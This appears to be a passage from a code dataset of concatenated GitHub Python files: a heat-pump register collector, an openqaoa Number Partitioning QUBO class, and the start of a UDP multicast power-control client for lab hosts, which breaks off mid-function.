:param cluster_solution_name:\n :param size:\n :param color:\n :return: series with genes of highest color and score product per cluster\n \"\"\"\n size_df = marker_df.pivot(\n index=\"gene\",\n columns=\"cluster\",\n values=size\n )\n\n color_df = marker_df.pivot(\n index=\"gene\",\n columns=\"cluster\",\n values=color\n )\n rank = size_df.std(axis=1) * color_df.std(axis=1)\n #print(rank.head())\n return rank.sort_values()[-40:].index\n\n\n","repo_name":"Stuartlab-UCSC/cluster-db","sub_path":"cluster/cli/create/worksheet_state.py","file_name":"worksheet_state.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73962997208","text":"import logging\nfrom connection import Connection\n\n\nclass Collection:\n \"\"\"\n\n \"\"\"\n\n\n\n def __init__(self, config):\n \"\"\"\n Erstellt die Connection und übergibt die benätigten Keys für die Wärmepumpe.\n \"\"\"\n logging.debug(\"Collection - init\")\n #\n self.__config = config\n self.__data = {}\n #\n self.__con = Connection(self.__config[\"heatpump\"][\"ip\"],\n self.__config[\"heatpump\"][\"user\"],\n self.__config[\"heatpump\"][\"pwd\"])\n #\n self.__con.set_keys([\n \"A1\", \"A2\", \"A3\", \"A4\", \"A5\", \"A6\", \"A7\", \"A8\", \"A10\", \"A11\", \"A12\", \"A13\", \"A14\", \"A15\", \"A19\", \"A25\",\n \"A26\", \"A27\", \"A28\", \"A29\", \"A30\", \"A31\", \"A33\", \"A34\", \"A37\", \"A38\", \"A61\", \"A90\", \"A91\", \"A92\", \"A93\",\n \"A94\", \"A95\", \"A96\", \"A97\", \"A107\", \"A108\", \"A109\", \"A139\", \"A1014\", \"A1035\", \"A1469\", \"I8\", \"I9\", \"I30\",\n \"I31\", \"I32\", \"I51\", \"I52\", \"I53\"],\n 0)\n self.__con.set_keys([], 1)\n self.__con.set_keys([], 2)\n self.__con.set_keys(\n [\"I5\", \"I6\", \"I7\", \"I10\", \"I14\", \"I18\", \"I20\", \"I22\", \"I33\", \"I41\", \"I135\", \"I263\", \"I1270\", \"I1281\",\n \"I1287\", \"I1289\", \"I1291\", \"I1293\", \"I1295\", \"I1297\", \"I1299\", \"I1319\", \"I2020\", \"I2021\", \"I2023\"],\n 3)\n self.__con.set_keys([], 4)\n #\n self.__lauf = [1, 1, 1, 1, 1]\n self.__max_lauf = [1, 5, 10, 20, 120]\n # con.get_status()\n pass\n\n\n\n def collect_data(self):\n \"\"\"\n Startet das Auslesen der Daten.\n \"\"\"\n logging.debug(\"Collection - collect_data [{0},{1},{2},{3},{4}]\".format(\n self.__lauf[0] - 1,\n self.__lauf[1] - 1,\n self.__lauf[2] - 1,\n self.__lauf[3] - 1,\n self.__lauf[4] - 1\n ))\n for i in range(0, 5):\n self.__lauf[i] -= 1\n if self.__lauf[i] < 1:\n logging.debug(\"Collection - collect_data KeySet:{0}\".format(i))\n self.__lauf[i] = self.__max_lauf[i]\n _erg = self.__con.get_values(i)\n # print(\"Status: \" + str(self.__con.get_status()))\n self.prepare(_erg)\n pass\n\n\n\n def get_all_data(self):\n \"\"\"\n Gibt alle Daten zurück.\n \"\"\"\n return self.__data\n\n\n\n def get_data(self, key):\n \"\"\"\n Gibt die einzelnen Values der Keys mit richtigem Typ zurück.\n \"\"\"\n logging.debug(\"Collection - get_data\")\n pass\n\n\n\n def into_data_int(self, data, keyname, command, german, unitname):\n try:\n val = data[keyname]\n if val[\"status\"]:\n self.__data[command] = {\n \"key\": command,\n \"value\": int(val[\"value\"]),\n \"name\": german,\n \"unit\": unitname,\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[command][\"key\"], self.__data[command][\"value\"],\n self.__data[command][\"unit\"]))\n else:\n self.__data[command][\"status\"] = False\n except KeyError:\n pass\n\n\n\n def into_data_float(self, data, keyname, command, german, unitname):\n try:\n val = data[keyname]\n if val[\"status\"]:\n self.__data[command] = {\n \"key\": command,\n \"value\": int(val[\"value\"]) / 10.0,\n \"name\": german,\n \"unit\": unitname,\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[command][\"key\"], self.__data[command][\"value\"],\n self.__data[command][\"unit\"]))\n else:\n self.__data[command][\"status\"] = False\n except KeyError:\n pass\n\n\n\n def prepare(self, data):\n \"\"\"\n Fügt die erhaltenen Daten in die passenden Keys ein.\n siehe: https://github.com/openhab/openhab1-addons/blob/master/bundles/binding/org.openhab.binding.ecotouch/src/main/java/org/openhab/binding/ecotouch/EcoTouchTags.java\n \"\"\"\n logging.debug(\"Collection - prepare\")\n\n #\n #\n #\n\n self.into_data_float(data, \"A1\", \"temp_outside\", \"Außentemperatur\", \"°C\")\n self.into_data_float(data, \"A2\", \"temp_outside_1h\", \"Außentemperatur gemittelt über 1h\", \"°C\")\n self.into_data_float(data, \"A3\", \"temp_outside_24h\", \"Außentemperatur gemittelt über 24h\", \"°C\")\n self.into_data_float(data, \"A4\", \"temp_source_in\", \"Quelle Eintritt Temp.\", \"°C\")\n self.into_data_float(data, \"A5\", \"temp_source_out\", \"Quelle Austritt Temp.\", \"°C\")\n self.into_data_float(data, \"A6\", \"temp_evaporation\", \"Verdampfungs Temp.\", \"°C\")\n self.into_data_float(data, \"A7\", \"temp_suction\", \"Sauggastemperatur\", \"°C\")\n self.into_data_float(data, \"A8\", \"press_evaporation\", \"Verdampfungsdruck\", \"bar\")\n self.into_data_float(data, \"A10\", \"temp_return_set\", \"Temperatur Rücklauf Soll\", \"°C\")\n self.into_data_float(data, \"A11\", \"temp_return\", \"Temperatur Rücklauf\", \"°C\")\n self.into_data_float(data, \"A12\", \"temp_flow\", \"Temperatur Vorlauf\", \"°C\")\n self.into_data_float(data, \"A13\", \"temp_condensation2\", \"Kondensationstemperatur 2\", \"°C\")\n self.into_data_float(data, \"A14\", \"temp_condensation\", \"Kondensationstemperatur\", \"°C\")\n self.into_data_float(data, \"A15\", \"press_condensation\", \"Kondensationsdruck\", \"bar\")\n self.into_data_float(data, \"A19\", \"temp_water\", \"Warmwasser-Temp. Aktuell\", \"°C\")\n self.into_data_float(data, \"A25\", \"power_compressor\", \"elektrische Leistung Verdichter\", \"kW\")\n self.into_data_float(data, \"A26\", \"power_heating\", \"abgegebene thermische Heizleistung der Wärmepumpe\", \"kW\")\n self.into_data_float(data, \"A27\", \"power_cooling\", \"abgegebene thermische KälteLeistung der Wärmepumpe\", \"kW\")\n self.into_data_float(data, \"A28\", \"cop_heating\", \"COP Heizleistung\", \"\")\n self.into_data_float(data, \"A29\", \"cop_cooling\", \"COP Kälteleistungleistung\", \"\")\n self.into_data_float(data, \"A30\", \"temp_heating\", \"Heizen-Temp. Akt. Rücklauf\", \"°C\")\n self.into_data_float(data, \"A31\", \"temp_heating_set\", \"Heizen-Temp. Soll\", \"°C\")\n self.into_data_float(data, \"A33\", \"temp_cooling_return\", \"Aktuelle Kühlkreistemperatur\", \"°C\")\n self.into_data_float(data, \"A34\", \"temp_cooling_set\", \"Geforderte Temperatur im Kühlbetrieb\", \"°C\")\n self.into_data_float(data, \"A37\", \"temp_water_set\", \"Warmwasser-Temp. Soll\", \"°C\")\n self.into_data_float(data, \"A38\", \"temp_water_set2\", \"Warmwasser-Temp. Sollwert\", \"°C\")\n self.into_data_float(data, \"A61\", \"hysteresis_heating\", \"Schaltdifferenz Heizen\", \"°C\")\n self.into_data_float(data, \"A90\", \"temp_out_1h_heating\", \"Heizkurve - Außentemperatur 1h\", \"°C\")\n self.into_data_float(data, \"A91\", \"temp_nvi_outside_x1\", \"Heizkurve - T-Norm-Aussen (x1)\", \"°C\")\n self.into_data_float(data, \"A92\", \"temp_nvi_heating_y1\", \"Heizkurve - T-Heizkreis-Norm (y1)\", \"°C\")\n self.into_data_float(data, \"A93\", \"temp_nvi_outside_x2\", \"Heizkurve - T-Heizgrenze (x2)\", \"°C\")\n self.into_data_float(data, \"A94\", \"temp_nvi_heating_y2\", \"Heizkurve - T-Heizgrenze-Soll (y2)\", \"°C\")\n self.into_data_float(data, \"A95\", \"nvi_temp_max\", \"Heizkurve max. VL-Temp\", \"°C\")\n self.into_data_float(data, \"A96\", \"temp_nvi_heating_set\", \"Heiztemperatur Soll\", \"°C\")\n self.into_data_float(data, \"A97\", \"temp_set_0deg\", \"Heizkreis Soll-Temp bei 0° Aussen\", \"°C\")\n self.into_data_float(data, \"A107\", \"hysteresis_cooling\", \"Schaltdifferenz Kühlen\", \"°C\")\n self.into_data_float(data, \"A108\", \"temp_cooling_enable\", \"Kühlen Einschalt-Temp. Aussentemp\", \"°C\")\n self.into_data_float(data, \"A109\", \"temp_cooling\", \"Heizkurve - nviSollKuehlen\", \"°C\")\n self.into_data_float(data, \"A139\", \"hysteresis_water\", \"Schaltdifferenz Warmwasser\", \"°C\")\n self.into_data_float(data, \"A1014\", \"temp_dt\", \"Temperatur dT\", \"°C\")\n self.into_data_float(data, \"A1035\", \"temp_source_dt\", \"Quelle dT\", \"°C\")\n self.into_data_float(data, \"A1469\", \"expansion_valve\", \"% Ventilöffnung elektrisches Expansionsventil\", \"%\")\n self.into_data_int(data, \"I5\", \"date_day\", \"Datum: Tag\", \"\")\n self.into_data_int(data, \"I6\", \"date_month\", \"Datum: Monat\", \"\")\n self.into_data_int(data, \"I7\", \"date_year\", \"Datum: Jahr\", \"\")\n self.into_data_int(data, \"I8\", \"time_hour\", \"Uhrzeit: Stunde\", \"\")\n self.into_data_int(data, \"I9\", \"time_minute\", \"Uhrzeit: Minute\", \"\")\n self.into_data_int(data, \"I10\", \"operating_hours_compressor1\", \"Betriebsstunden Verdichter 1\", \"h\")\n self.into_data_int(data, \"I14\", \"operating_hours_compressor2\", \"Betriebsstunden Verdichter 2\", \"h\")\n self.into_data_int(data, \"I18\", \"operating_hours_circulation_pump\", \"Betriebsstunden Heizungsumwälzpumpe\",\n \"h\")\n self.into_data_int(data, \"I20\", \"operating_hours_source_pump\", \"Betriebsstunden Quellenpumpe\", \"h\")\n self.into_data_int(data, \"I22\", \"operating_hours_solar\", \"Betriebsstunden Solarkreis\", \"h\")\n self.into_data_int(data, \"I30\", \"enable_heating\", \"Handabschaltung Heizbetrieb\", \"\")\n self.into_data_int(data, \"I31\", \"enable_cooling\", \"Handabschaltung Kühlbetrieb\", \"\")\n self.into_data_int(data, \"I32\", \"enable_warmwater\", \"Handabschaltung Warmwasserbetrieb\", \"\")\n self.into_data_int(data, \"I33\", \"enable_pool\", \"Handabschaltung Pool_Heizbetrieb\", \"\")\n self.into_data_int(data, \"I41\", \"enable_pv\", \"Betriebsmodus PV 0=Aus, 1=Auto, 2=Ein\", \"\")\n self.into_data_int(data, \"I52\", \"alarm\", \"Meldungen von Ausfällen F0xx die zum Wärmepumpenausfall führen\", \"\")\n self.into_data_int(data, \"I53\", \"interruptions\", \"Unterbrechungen\", \"\")\n self.into_data_int(data, \"I135\", \"state_service\", \"Serviceebene (0: normal, 1: service)\", \"\")\n self.into_data_float(data, \"I263\", \"adapt_heating\", \"Temperaturanpassung für die Heizung\", \"°C\")\n self.into_data_int(data, \"I1270\", \"manual_heatingpump\", \"Handschaltung Heizungspumpe (H-0-A)\", \"\")\n self.into_data_int(data, \"I1281\", \"manual_sourcepump\", \"Handschaltung Quellenpumpe (H-0-A)\", \"\")\n self.into_data_int(data, \"I1287\", \"manual_solarpump1\", \"Handschaltung Solarpumpe 1 (H-0-A)\", \"\")\n self.into_data_int(data, \"I1289\", \"manual_solarpump2\", \"Handschaltung Solarpumpe 2 (H-0-A)\", \"\")\n self.into_data_int(data, \"I1291\", \"manual_tankpump\", \"Handschaltung Speicherladepumpe (H-0-A)\", \"\")\n self.into_data_int(data, \"I1293\", \"manual_valve\", \"Handschaltung Brauchwasserventil (H-0-A)\", \"\")\n self.into_data_int(data, \"I1295\", \"manual_poolvalve\", \"Handschaltung Poolventil (H-0-A)\", \"\")\n self.into_data_int(data, \"I1297\", \"manual_coolvalve\", \"Handschaltung Kühlventil (H-0-A)\", \"\")\n self.into_data_int(data, \"I1299\", \"manual_4wayvalve\", \"Handschaltung Vierwegeventil (H-0-A)\", \"\")\n self.into_data_int(data, \"I1319\", \"manual_multiext\", \"Handschaltung Multiausgang Ext. (H-0-A)\", \"\")\n self.into_data_float(data, \"I2020\", \"temp_surrounding\", \"Umgebung\", \"°C\")\n self.into_data_float(data, \"I2021\", \"temp_suction_air\", \"Sauggas\", \"°C\")\n self.into_data_float(data, \"I2023\", \"temp_sump\", \"Ölsumpf\", \"°C\")\n\n #\n # \"I51\" : \"state\" : \"Status der Wärmepumpenkomponenten\"\n #\n self.into_data_int(data, \"I51\", \"state\", \"Status der Wärmepumpenkomponenten\", \"\")\n\n #\n # \"I51.0\" : \"state_sourcepump\" : \"Status der Wärmepumpenkomponenten: Quellenpumpe\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_sourcepump\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[0],\n \"name\": \"Status der Wärmepumpenkomponenten: Quellenpumpe\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.1\" : \"state_heatingpump\" : \"Status der Wärmepumpenkomponenten: Heizungsumwälzpumpe\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_heatingpump\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[1],\n \"name\": \"Status der Wärmepumpenkomponenten: Heizungsumwälzpumpe\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.2\" : \"state_evd\" : \"Status der Wärmepumpenkomponenten: Freigabe Regelung EVD\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_evd\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[2],\n \"name\": \"Status der Wärmepumpenkomponenten: Freigabe Regelung EVD\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.3\" : \"state_compressor1\" : \"Status der Wärmepumpenkomponenten: Verdichter 1\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_compressor1\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[3],\n \"name\": \"Status der Wärmepumpenkomponenten: Verdichter 1\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.4\" : \"state_compressor2\" : \"Status der Wärmepumpenkomponenten: Verdichter 2\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_compressor2\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[4],\n \"name\": \"Status der Wärmepumpenkomponenten: Verdichter 2\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.5\" : \"state_extheater\" : \"Status der Wärmepumpenkomponenten: externer Wärmeerzeuger\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_extheater\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[5],\n \"name\": \"Status der Wärmepumpenkomponenten: externer Wärmeerzeuger\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.6\" : \"state_alarm\" : \"Status der Wärmepumpenkomponenten: Alarmausgang\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_alarm\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[6],\n \"name\": \"Status der Wärmepumpenkomponenten: Alarmausgang\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.7\" : \"state_cooling\" : \"Status der Wärmepumpenkomponenten: Motorventil Kühlbetrieb\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_cooling\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[7],\n \"name\": \"Status der Wärmepumpenkomponenten: Motorventil Kühlbetrieb\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.8\" : \"state_water\" : \"Status der Wärmepumpenkomponenten: Motorventil Warmwasser\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_water\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[8],\n \"name\": \"Status der Wärmepumpenkomponenten: Motorventil Warmwasser\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.9\" : \"state_pool\" : \"Status der Wärmepumpenkomponenten: Motorventil Pool\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_pool\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[9],\n \"name\": \"Status der Wärmepumpenkomponenten: Motorventil Pool\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.10\" : \"state_solar\" : \"Status der Wärmepumpenkomponenten: Solarbetrieb\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_solar\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[10],\n \"name\": \"Status der Wärmepumpenkomponenten: Solarbetrieb\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.11\" : \"state_cooling4way\" : \"Status der Wärmepumpenkomponenten: 4-Wegeventil im Kältekreis\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_cooling4way\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[11],\n \"name\": \"Status der Wärmepumpenkomponenten: 4-Wegeventil im Kältekreis\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # print()\n pass\n","repo_name":"dk3qu/heatpump_2_mqtt","sub_path":"collection.py","file_name":"collection.py","file_ext":"py","file_size_in_byte":22795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10373891522","text":"import numpy as np\n\nfrom ..utilities import check_kwargs\nfrom .problem import Problem\nfrom .qubo import QUBO\n\n\nclass NumberPartition(Problem):\n \"\"\"\n Creates an instance of the Number Partitioning problem.\n\n Parameters\n ----------\n numbers: List[int]\n The list of numbers to be partitioned.\n\n Returns\n -------\n An instance of the Number Partitioning problem.\n \"\"\"\n\n __name__ = \"number_partition\"\n\n def __init__(self, numbers=None):\n # Set the numbers to be partitioned. If not given, generate a random list with integers\n self.numbers = numbers\n self.n_numbers = None if numbers == None else len(self.numbers)\n\n @property\n def numbers(self):\n return self._numbers\n\n @numbers.setter\n def numbers(self, input_numbers):\n if not isinstance(input_numbers, list):\n raise TypeError(\"The input parameter, numbers, has to be a list\")\n\n for each_entry in input_numbers:\n if not isinstance(each_entry, int):\n raise TypeError(\"The elements in numbers list must be of type int.\")\n\n self._numbers = input_numbers\n\n @staticmethod\n def random_instance(**kwargs):\n \"\"\"\n Creates a random instance of the Number Partitioning problem.\n\n Parameters\n ----------\n n_numbers: int\n The number of numbers to be partitioned. This is a required keyword argument.\n\n Returns\n -------\n A random instance of the Number Partitioning problem.\n \"\"\"\n n_numbers = check_kwargs([\"n_numbers\"], [None], **kwargs)\n\n # Set a random number generator\n seed = kwargs.get(\"seed\", None)\n seed = seed if isinstance(seed, int) else None\n rng = np.random.default_rng(seed)\n\n numbers = list(map(int, rng.integers(1, 10, size=n_numbers)))\n return NumberPartition(numbers)\n\n @property\n def qubo(self):\n \"\"\"\n Returns the QUBO encoding of this problem.\n\n Returns\n -------\n The QUBO encoding of this problem.\n \"\"\"\n terms = []\n weights = []\n constant_term = 0\n\n # Consider every pair of numbers (ordered)\n for i in range(self.n_numbers):\n for j in range(i, self.n_numbers):\n # If i equals j, then whatever random sign we choose, if we square\n # it we can back 1. So we have a constant term.\n if i == j:\n constant_term += self.numbers[i] * self.numbers[j]\n\n # Otherwise the weight is computed as being the product of the\n # numbers in the pair, multiplied by 2 (since we account for\n # both pair (i, j) and (j, i)\n else:\n term = [i, j]\n weight = 2 * self.numbers[i] * self.numbers[j]\n\n terms.append(term)\n weights.append(weight)\n\n # If the constant term is non-zero, we may add it to terms and weights\n if constant_term > 0:\n terms.append([])\n weights.append(constant_term)\n\n return QUBO(self.n_numbers, terms, weights, self.problem_instance)\n","repo_name":"entropicalabs/openqaoa","sub_path":"src/openqaoa-core/openqaoa/problems/numberpartition.py","file_name":"numberpartition.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"31"} +{"seq_id":"24894011182","text":"import argparse\nimport socket\nimport struct\nimport sys\nimport timeit\n\nfrom ifconfig import get_mgmt_iface\nfrom utils import get_atf_logger, get_host_number\n\nSCRIPT_STATUS_SUCCESS = \"[PCONTROL-SUCCESS]\"\nSCRIPT_STATUS_FAILED = \"[PCONTROL-FAILED]\"\n\nlog = get_atf_logger()\n\nUDP_GROUP = \"225.0.0.37\"\nUDP_PORT = 24852\n\nUDP_MAGIC = 0xC001\n\nUDP_CMD = {\n \"PING\": 0x00,\n \"RESET\": 0x01,\n \"POWER\": 0x02,\n \"OFF\": 0x03,\n \"STATUS\": 0x04,\n \"COLD\": 0x05,\n \"CH\": 0x06,\n \"GPIO\": 0x07\n}\n\nUDP_STATUS = {\n \"NACK\": 0x80,\n \"ACK\": 0x81,\n \"RES\": 0x82,\n \"HDD\": 0x83,\n \"LED\": 0x84,\n \"PWR\": 0x85,\n \"STB\": 0x86,\n \"VCC\": 0x87,\n \"CH\": 0x88,\n \"GPIO\": 0x89\n}\n\nGPIO_ENABLE = 1\nGPIO_DISABLE = 0\n\nPIN_GPIO = 8\n\n\ndef check_host(func):\n def wrapper(*args, **kwargs):\n if isinstance(args[1], str):\n args_list = list(args)\n args_list[1] = get_host_number(args[1])\n args = tuple(args_list)\n\n return func(*args, **kwargs)\n\n return wrapper\n\n\nclass PControlPacket(object):\n def __init__(self, to_id=None, data=None):\n self.magic = UDP_MAGIC\n self.pid = 0\n self.from_id = 0\n self.to_id = to_id if to_id is not None else 0\n self.seen = 0\n if data is not None:\n self.len = len(data)\n self.data = data\n else:\n self.len = 0\n self.data = b\"\"\n\n def to_string(self):\n return struct.pack(\"!IIIIIB\", self.magic, self.pid, self.from_id, self.to_id, self.seen, self.len) + self.data\n\n @staticmethod\n def from_string(s):\n hdr_len = struct.calcsize(\"!IIIIIB\")\n p = PControlPacket()\n\n p.magic, p.pid, p.from_id, p.to_id, p.seen, p.len = struct.unpack(\"!IIIIIB\", s[:hdr_len])\n p.data = s[hdr_len:hdr_len + p.len]\n\n return p\n\n def dump(self):\n log.info(\"[PControl]\")\n log.info(\" magic = 0x{:x}\".format(self.magic))\n log.info(\" pid = {}\".format(self.pid))\n log.info(\" from_id = {}\".format(self.from_id))\n log.info(\" to_id = {}\".format(self.to_id))\n log.info(\" seen = {}\".format(self.seen))\n log.info(\" len = {}\".format(self.len))\n log.info(\" data = {} [{}]\".format(self.data.encode(\"hex\"), PControlPacket.get_command_name(\n struct.unpack(\"B\", self.data[0])[0] if self.len else 0xFF)))\n\n @staticmethod\n def get_command_name(to_id):\n for name, val in UDP_CMD.iteritems():\n if val == to_id:\n return \"UDP_CMD_{}\".format(name)\n for name, val in UDP_STATUS.iteritems():\n if val == to_id:\n return \"UDP_STATUS_{}\".format(name)\n return \"unknown\"\n\n @staticmethod\n def get_ping_cmd_data():\n return struct.pack(\"B\", UDP_CMD[\"PING\"])\n\n @staticmethod\n def get_reset_cmd_data(length=200, delay=0):\n return struct.pack(\"!Bii\", UDP_CMD[\"RESET\"], length, delay)\n\n @staticmethod\n def get_power_cmd_data(length=200, delay=0):\n return struct.pack(\"!Bii\", UDP_CMD[\"POWER\"], length, delay)\n\n @staticmethod\n def get_off_cmd_data(length=10000, delay=0):\n return struct.pack(\"!Bii\", UDP_CMD[\"OFF\"], length, delay)\n\n @staticmethod\n def get_status_cmd_data():\n return struct.pack(\"B\", UDP_CMD[\"STATUS\"])\n\n @staticmethod\n def get_cold_cmd_data(length=10000, delay=0):\n return struct.pack(\"!Bii\", UDP_CMD[\"COLD\"], length, delay)\n\n @staticmethod\n def get_ch_cmd_data(channel=0, length=10000, delay=0):\n return struct.pack(\"!Biii\", UDP_CMD[\"CH\"], channel, length, delay)\n\n @staticmethod\n def get_gpio_cmd_data(gpio=0, on_off=0):\n return struct.pack(\"!Bii\", UDP_CMD[\"GPIO\"], gpio, on_off)\n\n\nclass PControl(object):\n PING_TIMEOUT = 2.0\n STATUS_TIMEOUT = 2.0\n\n def __init__(self):\n self.local_ip = get_mgmt_iface()[2]\n\n def get_udp_socket(self):\n # Create a UDP socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n # Allow reuse of addresses\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n # Set multicast interface to local_ip\n sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, socket.inet_aton(self.local_ip))\n\n # Set multicast time-to-live to 2...should keep our multicast packets from escaping the local network\n sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)\n\n # Construct a membership request...tells router what multicast group we want to subscribe to\n membership_request = socket.inet_aton(UDP_GROUP) + socket.inet_aton(self.local_ip)\n\n # Send add membership request to socket\n # See http://www.tldp.org/HOWTO/Multicast-HOWTO-6.html for explanation of sockopts\n sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, membership_request)\n\n # Bind socket to group to be able ro receive messages\n if sys.platform == \"win32\":\n sock.bind((self.local_ip, UDP_PORT))\n elif sys.platform == \"darwin\" or \"freebsd\" in sys.platform:\n sock.bind((\"\", UDP_PORT))\n else:\n sock.bind((UDP_GROUP, UDP_PORT))\n\n return sock\n\n def _send_pcontrol_packet(self, p, s=None):\n if s is None:\n sock = self.get_udp_socket()\n else:\n sock = s\n\n try:\n log.info(\"Sending next Power Control packet:\")\n p.dump()\n sock.sendto(p.to_string(), (UDP_GROUP, UDP_PORT))\n finally:\n if s is None:\n sock.close()\n\n @check_host\n def ping(self, to_id):\n sock = self.get_udp_socket()\n\n try:\n sock.setblocking(False)\n\n p = PControlPacket(to_id, PControlPacket.get_ping_cmd_data())\n self._send_pcontrol_packet(p, sock)\n\n start_time = timeit.default_timer()\n while timeit.default_timer() - start_time < PControl.PING_TIMEOUT:\n try:\n data = sock.recv(1024)\n except socket.error:\n 